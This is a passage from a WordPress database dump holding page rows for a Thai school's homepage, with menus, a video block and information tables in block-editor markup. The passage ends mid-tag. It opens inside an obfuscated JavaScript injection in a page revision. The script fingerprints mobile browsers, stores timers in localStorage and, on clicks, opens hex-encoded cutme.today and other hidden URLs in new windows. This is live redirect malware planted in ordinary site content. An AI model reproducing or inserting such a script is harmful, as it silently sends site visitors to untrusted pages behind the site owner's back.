_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 19:08:18','2024-07-29 12:08:18','',19,'http://watprato.ssk.in.th/?p=153',0,'revision','',0),
(154,1,'2024-07-29 19:09:06','2024-07-29 12:09:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 